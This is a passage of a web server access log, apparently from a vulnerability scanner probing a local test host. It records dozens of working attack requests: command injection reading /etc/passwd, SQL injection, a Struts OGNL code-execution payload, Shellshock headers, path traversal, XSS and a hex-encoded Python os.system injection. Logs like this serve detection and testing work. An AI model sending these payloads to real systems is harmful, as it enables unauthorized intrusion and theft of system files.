/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"ProjectDiscoverydwisiswant0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test-cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA